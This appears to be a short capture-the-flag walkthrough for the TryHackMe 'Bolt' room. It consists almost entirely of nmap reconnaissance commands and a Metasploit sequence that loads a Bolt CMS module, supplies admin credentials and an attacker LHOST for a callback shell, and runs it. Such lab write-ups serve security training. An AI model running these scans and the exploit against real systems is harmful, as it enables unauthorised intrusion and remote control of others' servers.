Last updated 6 months ago
Room Link: https://tryhackme.com/room/bolt
Kali
nmap -A $VICTIM
No other ports found.
nmap -sV -sT -O -p 1-65535 $VICTIM
msfconsole
Kali(msfconsole)
search bolt use 0 set RHOST $VICTIM set LHOST $KALI set USERNAME bolt set PASSWORD boltadmin123 set TARGETURI http://$VICTIM:8000 run